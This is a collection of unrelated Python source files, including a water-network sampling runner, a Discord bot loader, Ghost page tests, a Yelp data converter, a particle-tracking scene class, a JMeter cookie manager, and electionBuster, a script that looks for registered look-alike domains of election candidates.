    #doc = _gui.getDoc(sUuid)
    com = p.communicate()
    sOut = com[0]
    #
    sFile = sOutputPrefix + "_grabsample_results.json"
    results = _gui.readJsonFile(sFile, {"Error": "output file was not created: " + sFile})
    sOUT = sOutputPrefix + "_samplelocation.out"
    debug_text_out_file = _gui.readFile(sOUT)
    doc = _gui.getDoc(sUuid)
    bError = False
    if bErrorOverTime:
        sError = "the sample time is after the end of the simulation."
        results = {"Error": sError}
        doc["Error"] = sError
        bError = True
    elif results.get("Error") is not None:
        doc["Error"] = results["Error"]
        bError = True
    doc["results"] = results
    doc["results"]["sampleTime"] = results.get("sampleTime", 0) * 60 # TODO - this should be changed in the grabsample executable
    doc["debug_fileSCN"] = fSCN.name
    doc["debug_fileTSG"] = fTSG.name
    doc["debug_stdout"] = com[0]
    doc["returnCode"] = p.returncode
    doc["debug_text_out_file"] = debug_text_out_file
    #
    if com[1] is None:
        doc["debug_stderr"] = "\0"
    else:
        doc["debug_stderr"] = com[1]
    #
    # A kill signal leaves this marker in stdout; -1 means "not found".
    sKill = "Signal handler called from"
    index = sOut.find(sKill)
    doc["debug_stdout_find_error_index"] = index
    #
    if _gui.bDeleteTempFiles(override=None):
        _gui.removeFiles([fWQM, fTSG, fSCN, fINP, fSEN, fNodes, fYML])
        _gui.removeFile(sOutputPrefix + "_epanet.rpt")
        _gui.removeFile(sOutputPrefix + "_samplelocation.out")
        _gui.removeFile(sOutputPrefix + "_samplelocation.log")
        _gui.removeFile(sOutputPrefix + "_MERLION_LABEL_MAP.txt")
        _gui.removeFile(sOutputPrefix + "_GSP.dat")
        _gui.removeFile(sOutputPrefix + "_ampl.run")
        _gui.removeFile(sOutputPrefix + "_ampl.out")
        _gui.removeFile(sOutputPrefix + "_grabsample_results.dat")
        _gui.removeFile(sOutputPrefix + "_grabsample_results.json")
    #
    if index == -1 and p.returncode == 0:
        doc["status"] = "Complete"
    elif index == -1 or bError:
        doc["status"] = "Error"
    else:
        doc["status"] = "Stopped"
    #
    doc["timer"] = time.time() - nStart
    _gui.setDoc(sUuid, doc)
    return doc
def runThreaded(doc, sOutputPrefix, bThreaded=True):
    """Prepare all temp input files for the doc and launch runWst.

    When bThreaded is True the WST run happens in a separate process and
    None is returned; otherwise runWst runs inline and its result doc is
    returned. Fix: identity comparisons with None (`is None`).
    """
    sUuid = doc["_id"]
    dSampleTime = doc.get("sampleTime", 0)
    nSampleCount = doc.get("sampleCount", 3)
    docFile_INP = doc.get("docFile_INP")
    Nodes = doc.get("Nodes" )
    fWQM = _gui.createWqmFile(docFile_INP)
    # Fall back to the raw .inp file when no water-quality model exists.
    if fWQM is None:
        fINP = createInpFile(docFile_INP)
        fWQM = FakeFile()
    else:
        fINP = FakeFile()
    fSCN = createScnFile(sUuid) # FakeFile
    fTSG = createTsgFile(sUuid)
    fSEN = createSenFile(sUuid)
    if Nodes is None:
        fNodes = FakeFile()
    else:
        fNodes = createNodesFile(Nodes)
    fYML = createYmlFile(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, dSampleTime, nSampleCount, sOutputPrefix)
    _gui.closeFiles([fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML])
    #
    if bThreaded:
        p = Process(target=runWst, args=(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix, ))
        p.start()
    else:
        return runWst(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix)
    return
def run(sCall, sUuid, bThreaded=True):
    """Dispatch a GUI request; only the default (compute) call does work.

    Returns False for delete/rename (handled elsewhere), otherwise responds
    with an empty JSON payload after launching the run.
    """
    if sCall == "delete":
        return False
    if sCall == "rename":
        return False
    # Work out of the system temp directory so WST's outputs land there.
    sDir = tempfile.gettempdir()
    os.chdir(sDir)
    doc = _gui.getDoc(sUuid)
    # NOTE(review): sUuid is passed as runThreaded's sOutputPrefix parameter,
    # and the bThreaded argument of this function is ignored (True is
    # hard-coded) -- confirm both are intentional.
    runThreaded(doc, sUuid, True)
    return _gui.respondJSON(json.dumps({}))
def main():
    """Service loop: handle each incoming GUI request against its database."""
    _gui.setHost()
    for req in _gui.getRequests():
        sDb = _gui.getQuery(req, "db")
        _gui.setDatabase(sDb)
        sCall = _gui.getQuery(req, "call")
        sUuid = _gui.getQuery(req, "uuid")
        bRetVal = run(sCall, sUuid, True)
        # run() already responded unless it short-circuited with a falsy value.
        if bRetVal: continue
        _gui.respondJSON(json.dumps({}))
if __name__ == "__main__":
    main()
| 7,789 | 3,091 |
from discord.ext import commands
from configparser import ConfigParser
# Read the bot token from the [config] section of config.txt.
parser = ConfigParser()
parser.read("config.txt")
TOKEN = parser.get('config', 'token')
# Commands use a "!" prefix; the Webhook extension supplies the commands.
bot = commands.Bot(command_prefix='!')
bot.load_extension("Webhook")
bot.run(TOKEN)
| 246 | 81 |
from components.ghost.blogPage import BlogPage
from components.ghost.adminPanelPage import AdminPanelPage
class TestBlogPage(BlogPage):
    """Smoke test: the blog landing page loads with the expected title."""
    def test_01_open_blog_page(self):
        self.go_to()
        assert self.get_title() == "Blog for Testing"
class TestAdminPanelPage(AdminPanelPage):
    """Admin-panel checks: login is required, and admin credentials work."""
    def test_01_open_admin_panel_page(self):
        self.go_to()
        assert self.is_log_in_required()
    def test_02_log_in_to_admin_panel(self):
        self.go_to()
        self.log_in_as_admin()
        assert not self.is_log_in_required()
        # camelCase logOut comes from the page-object base class.
        self.logOut()
| 567 | 196 |
"""
{
'type': 'user',
'user_id': (encrypted user id),
'name': (first name),
'review_count': (review count),
'average_stars': (floating point average, like 4.31),
'votes': {(vote type): (count)},
'friends': [(friend user_ids)],
'elite': [(years_elite)],
'yelping_since': (date, formatted like '2012-03'),
'compliments': {
(compliment_type): (num_compliments_of_this_type),
...
},
'fans': (num_fans),
}
"""
import json
def main(f, o):
    """Project selected fields from a Yelp user dump into a JSON array.

    :param f: input path -- one JSON user object per line.
    :param o: output path -- written as a single JSON array where each user
        keeps `_id` (the user_id), `name`, `review_count` and a derived
        `friends_count`.

    Fix: both files are now managed with `with`, so the output handle is
    closed even when a line fails to parse (the original leaked it).
    """
    records = []
    with open(f, 'r') as fp:
        for line in fp.read().splitlines():
            user = json.loads(line)
            records.append(json.dumps({
                '_id': user['user_id'],
                'name': user['name'],
                'review_count': user['review_count'],
                'friends_count': len(user['friends']),
            }))
    with open(o, 'w') as out:
        # One record per line inside the array, matching the original layout.
        out.write('[' + ',\n'.join(records) + ']')
if __name__ == '__main__':
    main('../dataset/user.json', '../dataset/out.json')
| 1,038 | 385 |
# NanoSciTracker - 2020
# Author: Luis G. Leon Vega <luis@luisleon.me>
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# This project was sponsored by CNR-IOM
import copy
import cv2 as cv
import LocalTracker.detector as Detector
import LocalTracker.drawutils as DrawUtils
import LocalTracker.tracker as Tracker
import LocalTracker.matcher as DetectionMatcher
import Matcher.matcher as FeatureMatcher
class Scene:
    """One camera view of the world: runs detection at a sampled interval,
    keeps per-scene trackers up to date, and reports tracker life-cycle
    events (new / out-of-scene / dead) on every update."""
    def __init__(
        self,
        ROI=None,
        overlap=0,
        detection_sampling=3,
        detection_roi=None,
        settings=None
    ):
        # Get coordinates
        # ROI is ((x0, x1), (y0, y1)) in world coordinates.
        self.roi = ROI
        x, y = self.roi
        self.x0, self.x1 = x
        self.y0, self.y1 = y
        self.w = self.x1 - self.x0
        self.h = self.y1 - self.y0
        self.overlap = overlap
        self.frame = None
        # ROIs
        # Default detection region shrinks the frame by `overlap` on every side.
        if detection_roi is None:
            self.detection_roi = (
                self.overlap,
                self.overlap,
                self.w - self.overlap,
                self.h - self.overlap,
            )
        else:
            self.detection_roi = detection_roi
        # BBs
        self.trackers = []
        self.detections = []
        self.new_detections = []
        self.trackers_new_detections = []
        self.trackers_out_scene = []
        self.dead_trackers = []
        # Settings
        self._settings = settings
        if settings is None:
            raise RuntimeError("Scene settings are not valid")
        self.batches = self._settings.set_if_defined("batches", 2)
        self.grayscale = self._settings.set_if_defined("grayscale", True)
        self.world_size = self._settings.set_if_defined("world_size", None)
        # Frame counter used to decide when a detection pass runs.
        self.counter = 0
        self.detection_sampling = detection_sampling
    def load_frame(self, frame):
        """Stage the next colour frame for processing."""
        self.frame = frame
    def detect(self, gray_frame):
        """Run the detector on a grayscale frame; returns its detections."""
        padding = self._settings.set_if_defined("padding", None)
        return Detector.detect(gray_frame, self.batches, padding=padding)
    def track(self, colour_frame):
        """Advance all trackers on the frame and return their bounding boxes."""
        Tracker.updateTrackers(colour_frame, self.trackers, ROI=self.detection_roi)
        return Tracker.retrieveBBs(self.trackers)
    def update(self, colour_frame=None):
        """Process one frame: detect every `detection_sampling`-th frame,
        deploy trackers for unmatched detections, advance all trackers,
        and collect out-of-scene / dead trackers.

        Returns (trackers, trackers_out_scene, trackers_new_detections,
        dead_trackers)."""
        if not colour_frame is None:
            self.frame = colour_frame
        gray_detect = cv.cvtColor(self.frame, cv.COLOR_BGR2GRAY)
        # Perform detections and filter the new ones
        if self.counter % self.detection_sampling == 0:
            self.detections = self.detect(gray_detect)
            # Keep only detections not already covered by an existing tracker.
            self.new_detections = DetectionMatcher.inter_match(
                self.detections, self.trackers
            )
            # Deploy new trackers accordingly
            self.trackers_new_detections = Tracker.deployTrackers(
                self.frame,
                self.new_detections,
                self.trackers,
                ROI=self.detection_roi,
                offset=(self.x0, self.y0),
                grayscale=self.grayscale,
                world_size=self.world_size,
            )
        else:
            self.new_detections = []
            self.trackers_new_detections = []
        # Perform tracking update
        self.track(self.frame)
        # Catch trackers which went out of scene
        self.trackers_out_scene = Tracker.retrieveOutScene(self.trackers)
        self.dead_trackers = Tracker.retrieveDeadTrackers(self.trackers)
        self.counter += 1
        return (
            self.trackers,
            self.trackers_out_scene,
            self.trackers_new_detections,
            self.dead_trackers,
        )
    def draw(self, colour_frame):
        """
        Render an annotated copy of the frame (the input is not modified).
        Purple: New detections
        Red: Detections
        Blue: Trackers
        Light blue: Out of scene
        """
        colour_copy = copy.deepcopy(colour_frame)
        # Draw detections
        colour_copy = DrawUtils.draw_detections(
            colour_copy, self.new_detections, (255, 0, 255)
        )
        colour_copy = DrawUtils.draw_detections(
            colour_copy, self.detections, (0, 0, 255)
        )
        # Draw trackers
        colour_copy = DrawUtils.draw_trackers(colour_copy, self.trackers, (255, 0, 0))
        colour_copy = DrawUtils.draw_trackers(
            colour_copy, self.trackers_out_scene, (255, 255, 0)
        )
        return colour_copy
| 5,085 | 1,565 |
from abc import ABC, abstractmethod
class Shape(ABC):
    """Abstract base class for drawable shapes with a measurable area."""
    @abstractmethod
    def calculate_area(self):
        """Return the shape's area."""
        pass
    @abstractmethod
    def draw(self):
        """Render the shape."""
        pass
class Rectangle(Shape):
    """Concrete Shape with width/height sides.

    Fix: the original snippet used `def __init__(self, ...)` -- a literal
    `...` in a parameter list is a syntax error -- and omitted `draw`, so
    the ABC could never be instantiated.
    """
    def __init__(self, width=0, height=0):
        self.width = width
        self.height = height
    def calculate_area(self):
        """Return the rectangle's area (width * height)."""
        return self.width * self.height
    def draw(self):
        """Render the rectangle (placeholder implementation)."""
        pass
import logging
from typing import List, Optional
from enum import Enum
from xml.etree.ElementTree import Element
from jmeter_api.basics.config.elements import BasicConfig
from jmeter_api.basics.utils import Renderable, FileEncoding, tree_to_str
class CookiePolicy(Enum):
    """Cookie-policy identifiers; values are the strings JMeter stores in XML."""
    STANDARD = 'standard'
    STANDARD_STRICT = 'standard-strict'
    IGNORE = 'ignoreCookies'
    NETSCAPE = 'netscape'
    DEFAULT = 'default'
    RFC2109 = 'rfc2109'
    RFC2965 = 'RFC2965'
    BEST_MATCH = 'best-match'
class Cookie(Renderable):
    """One cookie entry rendered through the cookie.xml template.

    Bool and int fields are stored in the string forms the JMeter XML
    expects ('true'/'false', stringified ints), hence the `-> str` property
    annotations on bool/int-typed attributes.
    """
    TEMPLATE = 'cookie.xml'
    root_element_name = 'elementProp'
    def __init__(self, *,
                 name: str,
                 value: str,
                 domain: str = '',
                 path: str = '',
                 secure: bool = False,
                 expires: int = 0,
                 path_specified: bool = True,
                 domain_specified: bool = True):
        self.name = name
        self.value = value
        self.domain = domain
        self.path = path
        self.secure = secure
        self.expires = expires
        self.path_specified = path_specified
        self.domain_specified = domain_specified
    @property
    def name(self) -> str:
        return self._name
    @name.setter
    def name(self, value):
        if not isinstance(value, str):
            raise TypeError(
                f'name must be str. {type(value).__name__} was given')
        self._name = value
    @property
    def value(self) -> str:
        return self._value
    @value.setter
    def value(self, value):
        if not isinstance(value, str):
            raise TypeError(
                f'value must be str. {type(value).__name__} was given')
        self._value = value
    @property
    def domain(self) -> str:
        return self._domain
    @domain.setter
    def domain(self, value):
        if not isinstance(value, str):
            raise TypeError(
                f'domain must be str. {type(value).__name__} was given')
        self._domain = value
    @property
    def path(self) -> str:
        return self._path
    @path.setter
    def path(self, value):
        if not isinstance(value, str):
            raise TypeError(
                f'path must be str. {type(value).__name__} was given')
        self._path = value
    @property
    def expires(self) -> str:
        return self._expires
    @expires.setter
    def expires(self, value):
        # Validated as int, stored as str for XML serialization.
        if not isinstance(value, int):
            raise TypeError(
                f'expires must be int. {type(value).__name__} was given')
        self._expires = str(value)
    @property
    def secure(self) -> str:
        return self._secure
    @secure.setter
    def secure(self, value):
        # Validated as bool, stored as 'true'/'false'.
        if not isinstance(value, bool):
            raise TypeError(
                f'secure must be bool. {type(value).__name__} was given')
        self._secure = str(value).lower()
    @property
    def path_specified(self) -> str:
        return self._path_specified
    @path_specified.setter
    def path_specified(self, value):
        if not isinstance(value, bool):
            raise TypeError(
                f'path_specified must be bool. {type(value).__name__} was given')
        self._path_specified = str(value).lower()
    @property
    def domain_specified(self) -> str:
        return self._domain_specified
    @domain_specified.setter
    def domain_specified(self, value):
        if not isinstance(value, bool):
            raise TypeError(
                f'domain_specified must be bool. {type(value).__name__} was given')
        self._domain_specified = str(value).lower()
    def to_xml(self) -> str:
        """Fill the cookie template's properties and return it as a string."""
        xml_tree: Optional[Element] = super().get_template()
        element_root = xml_tree.find(self.root_element_name)
        element_root.attrib['name'] = self.name
        element_root.attrib['testname'] = self.name
        for element in list(element_root):
            try:
                if element.attrib['name'] == 'Cookie.value':
                    element.text = self.value
                elif element.attrib['name'] == 'Cookie.domain':
                    element.text = self.domain
                elif element.attrib['name'] == 'Cookie.path':
                    element.text = self.path
                elif element.attrib['name'] == 'Cookie.secure':
                    element.text = self.secure
                elif element.attrib['name'] == 'Cookie.expires':
                    element.text = self.expires
                elif element.attrib['name'] == 'Cookie.path_specified':
                    element.text = self.path_specified
                elif element.attrib['name'] == 'Cookie.domain_specified':
                    element.text = self.domain_specified
            except KeyError:
                logging.error(
                    f'Unable to properly convert {self.__class__} to xml.')
        return tree_to_str(xml_tree)
class HTTPCookieManager(BasicConfig, Renderable):
    """JMeter HTTP Cookie Manager configuration element.

    Holds a list of Cookie elements, the cookie policy, and whether cookies
    are cleared on each loop iteration. Fix: the original default
    `cookies: List[Cookie] = []` was a mutable default shared across every
    manager instance; a fresh list is now created per instance.
    """
    root_element_name = 'CookieManager'
    def __init__(self, *,
                 cookies: Optional[List[Cookie]] = None,
                 clear_each_iter: bool = False,
                 policy: CookiePolicy = CookiePolicy.STANDARD,
                 name: str = 'HTTP Cookie Manager',
                 comments: str = '',
                 is_enabled: bool = True):
        self.cookies = cookies if cookies is not None else []
        self.policy = policy
        self.clear_each_iter = clear_each_iter
        super().__init__(name=name, comments=comments, is_enabled=is_enabled)
    @property
    def policy(self):
        return self._policy
    @policy.setter
    def policy(self, value):
        if not isinstance(value, CookiePolicy):
            raise TypeError(
                f'policy must be CookiePolicy. {type(value).__name__} was given')
        self._policy = value
    @property
    def clear_each_iter(self) -> str:
        # Stored as the lowercase 'true'/'false' string JMeter expects.
        return self._clear_each_iter
    @clear_each_iter.setter
    def clear_each_iter(self, value):
        if not isinstance(value, bool):
            raise TypeError(
                f'clear_each_iter must be bool. {type(value).__name__} was given')
        self._clear_each_iter = str(value).lower()
    @property
    def cookies(self) -> str:
        return self._cookies
    @cookies.setter
    def cookies(self, value):
        if not isinstance(value, List):
            raise TypeError(
                f'arguments must be List. {type(value).__name__} was given')
        for el in value:
            if not isinstance(el, Cookie):
                raise TypeError(
                    f'arguments must contain only Cookie. {type(value).__name__} was given')
        self._cookies = value
    def to_xml(self) -> str:
        """Render this manager (and its cookies) into the XML template."""
        element_root, xml_tree = super()._add_basics()
        for element in list(element_root):
            try:
                if element.attrib['name'] == 'CookieManager.cookies':
                    element.text = ''
                    for arg in self.cookies:
                        element.text += arg.to_xml()
                elif element.attrib['name'] == 'CookieManager.clearEachIteration':
                    element.text = self.clear_each_iter
            except KeyError:
                logging.error(
                    f'Unable to properly convert {self.__class__} to xml.')
        # Only a non-default policy is written out explicitly.
        if not self.policy is CookiePolicy.STANDARD:
            el = Element('stringProp', attrib={'name': 'CookieManager.policy'})
            el.text = str(self.policy.value)
            element_root.append(el)
        return tree_to_str(xml_tree)
| 7,573 | 2,145 |
#!/usr/bin/python3.5
##################################################
## Author: Joshua Franklin, Kevin Franklin
## Example input to start:
## sudo ./electionBuster.py -f josh -l franklin -y 2014 -e senate -s pennsyltucky
## 6 arguments are passed:
## 1: The first name of the candidate (mandatory)
## 2: The middle name of the candidate (optional)
## 3: The last name of the candidate (mandatory)
## 4: The year of the election (mandatory)
## 5: The type of race, such as congress, senate, or president. (mandatory)
## 6: The state or region the candidate is from (optional)
##################################################
#TODO: Add a keyboard interrupt
import requests
import sys
import time
import string
import argparse
import socket
from datetime import date
import urllib
from multiprocessing import Pool as ThreadPool, Manager
import collections
import csv
import operator
from modules.utils import genAllDonate,genAll,generate_urls, tryURLforReal
from modules.text_tools import alphabet,alt_alphabets,skipLetter,stringAndStrip,removeDups,reverseLetter,wrongVowel,tlds
# Process-shared lists (multiprocessing.Manager) so worker processes can
# record candidate and confirmed URLs.
confirmedURLs = Manager().list()
allURLS = Manager().list()
class NameDenormalizer(object):
    """Case-insensitive lookup of name/alias groups loaded from a CSV file.

    Each CSV row is treated as a set of equivalent names (e.g. a state and
    its nicknames); every name in a row maps to the full set.
    """
    def __init__(self, filename=None):
        filename = filename or 'names.csv'
        lookup = collections.defaultdict(list)
        with open(filename) as f:
            reader = csv.reader(f)
            for line in reader:
                matches = set(line)
                for match in matches:
                    lookup[match].append(matches)
        self.lookup = lookup
    def __getitem__(self, name):
        # Lookup is keyed on the uppercased name.
        name = name.upper()
        if name not in self.lookup:
            raise KeyError(name)
        return self.lookup[name]
    def get(self, name, default=None):
        """Like dict.get, but falls back to {name} when no default is given.

        Fix: the `default` parameter was previously accepted and silently
        ignored; an explicit default is now honored while the legacy
        one-element-set fallback is preserved.
        """
        try:
            return self[name]
        except KeyError:
            if default is not None:
                return default
            return set( [name] )
# Program Timer
start_time = time.time()
# Function: casts and removes those pesky \r and \n
#Parse command line arguments
parser = argparse.ArgumentParser(description='Identifies registered candidate domains')
parser.add_argument('-f','--firstName', help='Candidate\'s first name',required=True)
parser.add_argument('-m','--middleName',help='Candidate\'s optional middle name')
parser.add_argument('-l','--lastName',help='Candidate\'s last name', required=True)
parser.add_argument('-y','--year', help='Year of the election',required=True)
parser.add_argument('-e','--electionType',help='Type of election (congress, senate, president)', required=True)
parser.add_argument('-s','--state', help='Candidate\'s state of origin', action='append' )
#Exists for candidates like Mitt Romney that possibly have an attachment to two states (i.e., Utah, Massachusetts)
parser.add_argument('-a','--aliasFileName', help='Filename containing a list of aliases')
parser.add_argument('-p','--party', help='Party Affiliation')
args = parser.parse_args()
# Stores command line arguments
# Make all lowercase
fName = args.firstName
fName = fName.lower()
lName = args.lastName
lName = lName.lower()
party = ""
year = args.year
shortYear = year[-2:]
electionType = args.electionType
electionType = electionType.lower()
state = []
stateText = ""
if (args.party) :
    party = args.party
# Default alias file; -a replaces it with a user-supplied one.
fileName = "states.csv"
if (args.aliasFileName) :
    fileName = stringAndStrip( args.aliasFileName)
if (args.state) :
    nd = NameDenormalizer( fileName )
    for aState in args.state:
        stateText = stateText + aState.lower()
        state.append( stringAndStrip( aState.upper( ) ) )
        # Expand each state through its alias groups (e.g. PA -> PENNSYLVANIA).
        statenick = list( nd.get( aState.upper() ) )
        for s1 in statenick:
            for s in s1:
                state.append( s )
mName = ""
middleInitial = ""
if (args.middleName) :
    mName = args.middleName
    mName = mName.lower()
    middleInitial = mName[0]
# This assigns the position variable
if (electionType == 'congress') or (electionType == 'congressional') :
    position = 'congress'
    altPosition = 'congressman' # congresswoman??
elif electionType == 'senate' :
    position = 'senator'
    altPosition = 'senate'
elif (electionType == 'governor') or (electionType == 'gubernatorial'):
    position = 'governor'
    altPosition = 'gov'
elif (electionType == 'president') or (electionType == 'presidential') :
    position = 'president'
    altPosition = 'prez'
elif (electionType == 'mayoral') or (electionType == 'mayor') :
    position = 'mayor'
    altPosition = 'mayoral'
else :
    # Unknown race types are used verbatim.
    position = electionType
    altPosition = electionType
# top-level domain-names
# # consider removing .me, .info, and .biz if they aren't adding value
# Runs stringAndStrip on everything except fileName b/c that's used elsewhere
fName = stringAndStrip(fName)
lName = stringAndStrip(lName)
year = stringAndStrip(year)
electionType = stringAndStrip(electionType)
# Alerting the users to the types of sites we're expecting to find
# This differs at times since the state variable isn't mandatory to run the script
## Consider deleting this - does it actually provide value?
if (args.state) :
    print('We expect to find these URLs excluding subtle variances:')
    print('http://www.' + fName + lName + '.com')
    print('http://www.' + lName + fName + '.com')
    print('http://www.' + fName + year + '.com')
    print('http://www.' + lName + year + '.com')
    print('http://www.' + fName + lName + year + '.com' )
    for stateAlias in state:
        print('http://www.' + fName + lName + 'for' + stateAlias + '.com')
        print('http://www.' + lName + 'for' + stateAlias + '.com')
        print('http://www.' + fName + 'for' + stateAlias + '.com')
    print('http://www.' + fName + lName + 'for' + position + '.com')
    print('http://www.' + fName + 'for' + position + '.com')
    print('http://www.' + fName + 'for' + position + year + '.com')
    print('http://www.' + position + fName + lName + '.com')
else :
    print('We expect to find these URLs excluding subtle variances:')
    print('http://www.' + fName + lName + '.com')
    print('http://www.' + lName + fName + '.com')
    print('http://www.' + fName + year + '.com')
    print('http://www.' + lName + year + '.com')
    print('http://www.' + fName + lName + year + '.com' )
    print('http://www.' + fName + lName + 'for' + position + '.com')
    print('http://www.' + fName + 'for' + position + '.com')
    print('http://www.' + fName + 'for' + position + year + '.com')
    print('http://www.' + position + fName + lName + '.com')
# This is the result output files
# Makes a unique filename based on date and time
now = date.today()
partyString = ""
if ( args.party ) :
    partyString = "-" + party.lower()
tempResults = 'results-' + fName + '-' + lName + '-' + stateText + partyString + '-' + str(now) + '.txt'
resultsFile = open(tempResults, "w")
# This clears the results files before reopening them
resultsFile.close()
resultsFile = open(tempResults, "a")
## Other alphabets are defined as a quick way of doing URL mangling.
## Is this a candidate for deletion?
# alternative alphabets
# 0: No change
# 1: i -> 1 "Eye to One"
# 2: l -> i "El to Eye"
# 3: i -> l "Eye to El"
# 4: o -> 0 "Oh to Zero"
# 5: 0 -> o "Zero to Oh"
# 6: n -> m "En to Em" TODO: Does this swap work right?
# 7: m -> n "Em to En"
# 8: e -> 3 "Ee to three"
# 9: 3 -> e "Three to ee"
# These are the template that we'll use based on the optional input parameters.
# The first one is if the state was input.
templates = generate_urls(first_name=args.firstName,
                          last_name=args.lastName,
                          state=state,
                          middlename=args.middleName,
                          position=position,
                          altPosition=altPosition,
                          year=args.year)
# This generates the text mangling
results = genAll(templates, alt_alphabets)
# This generates the text mangling with some other alternatives
resultsDonate = genAllDonate(templates, alt_alphabets)
#### LOOP 1 ####
# All examples use the input of 'josh franklin 2014 president DC'
#################
#http://www.joshfranklin.com
#http://www.josh2014.com
#http://www.franklin2014.com
#http://www.joshfranklin2014.com
#http://www.joshfranklinforDC.com
#http://www.joshfranklinDC.com
#http://www.joshforpresident.com
#http://www.josh4president.com
#http://www.joshforpresident2014.com
#http://www.josh4president2014.com
#http://www.presidentjoshfranklin.com
#http://www.president-josh-franklin.com
#http://www.presidentjoshforpresident2014.com
#http://www.presidentjosh4president2014.com
#http://www.presidentjoshfranklinforpresident2014.com
#http://www.presidentjosh-franklinforpresident2014.com
#http://www.presidentjoshfranklin4president2014.com
#http://www.presidentjosh-franklin4president2014.com
def tryURL(url):
    """Expand *url* with every TLD in the global ``tlds`` list.

    Each candidate is echoed to stdout and queued on the global ``allURLS``
    list for the later threaded lookup pass.
    """
    base = stringAndStrip(url)
    for tld in tlds:
        candidate = base + tld
        print('Trying: ' + candidate)
        allURLS.append(candidate)
print("Entering template loop 1^^^^^^^^^^^^^^^^^^^^^^^^^^" )
print(time.time() - start_time, "seconds")
# Queue every mangled template as a candidate URL.
for r in results:
    tryURL( 'http://www.' + r , )
### LOOP 2 ###
# Puts donate at the beginning &
# Removes the period after 'www'
############## extend the tlds list a little
tlds.append( '.republican' )
tlds.append( '.democrat' )
tlds.append( '.red' )
tlds.append( '.blue' )
tlds.append( '.vote' )
#These next few look for some of the larger parties
tryURL( 'http://www.republican' + fName + lName )
tryURL( 'http://www.democrat' + fName + lName )
tryURL( 'http://www.libertarian' + fName + lName )
tryURL( 'http://www.independent' + fName + lName )
tryURL( 'http://www.vote' + fName + lName ) #Example: votejoshfranklin.com
tryURL( 'http://www.vote' + fName + middleInitial + lName ) #Example: votejoshmichaelfranklin.com
tryURL( 'http://www.vote' + fName ) #Example: votejosh.com
tryURL( 'http://www.vote' + lName ) #Example: votefranklin.com
tryURL( 'http://www.' + lName + position ) #Example: franklinpresident.com
tryURL( 'http://www.' + lName + altPosition ) #Example: franklinprez.com
tryURL( 'http://www.real' + fName + lName ) #Example: realjoshfranklin.com
for stateAlias in state:
    tryURL( 'http://www.' + lName + 'for' + stateAlias ) #Example: franklinforDC.com
    tryURL( 'http://www.' + lName + '4' + stateAlias ) #Example: franklin4DC.com
tryURL( 'http://www.friendsof' + fName ) #Example: friendsofjosh.com
tryURL( 'http://www.friendsof' + lName ) #Example: friendsofjosh.com
tryURL( 'http://www.' + fName + 'sucks' ) #Example: joshsucks.com
tryURL( 'http://www.' + lName + 'sucks' ) #Example: franklinsucks.com
tryURL( 'http://www.' + fName ) #Example: josh.vote
tryURL( 'http://www.' + lName ) #Example: franklin.vote
tryURL( 'http://www.' + fName + lName ) #Example: joshfranklin.vote
tryURL( 'http://www.elect' + fName + lName )
tryURL( 'http://www.elect' + fName + middleInitial + lName )
tryURL( 'http://www.elect' + fName )
tryURL( 'http://www.elect' + lName )
tryURL( 'http://www.' + fName + middleInitial + year )
tryURL( 'http://www.' + middleInitial + lName )
print( ' Total URLS: ' + str(len(allURLS)) + "\n" )
# Deduplicate before hitting the network.
allURLS = removeDups( allURLS )
print( 'Unique URLS: ' + str(len(allURLS)) + "\n" )
pool = ThreadPool( 24 )
# Open the urls in their own threads
# and return the results
results = pool.map( tryURLforReal, allURLS )
pool.close()
pool.join()
#print(results)
# Each thread added an entry for each result (found or not, gotta filter the blanks)
# I'm doing this here since the file writes might not have been synchronized
# its just a fear I had
for i in results:
    resultsFile.write( i )
# NOTE(review): the trailing ', "seconds"' makes totalRuntime a TUPLE
# (elapsed, "seconds"), not a number -- str(totalRuntime) below therefore
# prints e.g. (12.3, 'seconds'). Probably unintended; confirm before fixing.
totalRuntime = time.time() - start_time, "seconds"
###### Write final results to logfile ###########
resultsFile.write( "######################################" + "\n" )
resultsFile.write( "ElectionBuster Scan Results: " + "\n" )
resultsFile.write( "######################################" + "\n" )
resultsFile.write( "INPUTS = " + str(fName) + ", " + str(mName) + ", " + str(lName) + ", " + str(year) + ", " + str(position) + ", " + str(altPosition) + ", " + str(stateText) + ", " + str(party) + "\n" )
resultsFile.write( "Total runtime was " + str(totalRuntime) + "\n" )
resultsFile.write( "There were " + str(len(confirmedURLs)) + " positive results." + "\n" )
resultsFile.write( "There were " + str(len(testedURLs)) + " unique URLs tested." + "\n" )
resultsFile.write( "-------------------------------------" + "\n" )
resultsFile.write( "Positive results: " + "\n" )
resultsFile.write( "-------------------------------------" + "\n" )
for url in confirmedURLs:
    resultsFile.write( str(url) + "\n" )
resultsFile.write( "\n" )
resultsFile.write( "-------------------------------------" + "\n" )
resultsFile.write( "EOF " + "\n" )
#for url in allURLS:
#    resultsFile.write( str(url) + "\n" )
#    print( str( url ) + "\n" )
###### Print final results to screen ###########
print( "###################################### " + "\n" )
print( "ElectionBuster Scan Results: " + "\n" )
print( "###################################### " + "\n" )
print( "INPUTS" + "\n" )
print( "First name: " + fName + "\n" )
print( "Middle name: " + mName + "\n" )
print( "Last name: " + lName + "\n" )
print( "Year: " + year + "\n" )
print( "Election type: " + electionType + "\n" )
print( "-------------------------------------" + "\n" )
print( "Total runtime was " + str(totalRuntime) + "\n" )
print( "-------------------------------------" + "\n" )
print( "Positive results: " + "\n" )
print( "There were " + str(len(confirmedURLs)) + " hits:" + "\n" )
print( "-------------------------------------" + "\n" )
print( "\n" )
for url in confirmedURLs:
    print( url )
print( "\n" )
# Bad things happen if these files are not properly closed
resultsFile.close()
"""Initialization of authentication."""
import json
import logging
import secrets
import uuid
from typing import TYPE_CHECKING, List, Optional
if TYPE_CHECKING:
from core.core import ApplicationCore
import aiohttp_jinja2
from aiohttp import hdrs, web
